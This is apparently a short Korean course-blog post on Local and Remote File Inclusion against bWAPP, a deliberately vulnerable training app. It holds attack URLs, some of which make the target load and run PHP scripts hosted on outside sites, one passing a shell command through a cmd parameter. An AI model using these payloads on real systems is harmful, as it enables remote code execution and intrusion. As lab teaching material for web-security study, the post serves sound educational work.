1. Local File Inclusion
http://[타겟 IP]/bWAPP/rlfi.php?language=lang_en.php&action=go
2. Remote File Inclusion
- 악성 스크립트
http://[타겟 IP]/bWAPP/rlfi.php?language=http://net123.tistory.com/attachment/cfile26.uf@9972323B5C72213133E1FE.php
- 내부 서버 자원 접근
http://[타겟 IP]/bWAPP/rlfi.php?language=https://blog.kakaocdn.net/dn/q8s5y/btrGg1EzbAG/bDcfKh3MCkvzz8L1Q7XnkK/tfile.php&action=go&cmd=pwd
'메가IT아카데미 국기과정 > JAVA와 웹보안' 카테고리의 다른 글
| [1-11] Unvalidated Redirects & Forwards (0) | 2022.09.13 |
|---|---|
| [1-10] XML External Entity Attacks (0) | 2022.09.13 |
| [1-8] Cross-Site Request Forgery (0) | 2022.09.13 |
| [1-7] Sensitive Data Exposure (0) | 2022.09.13 |
| [1-6] XSS Injection (0) | 2022.09.13 |
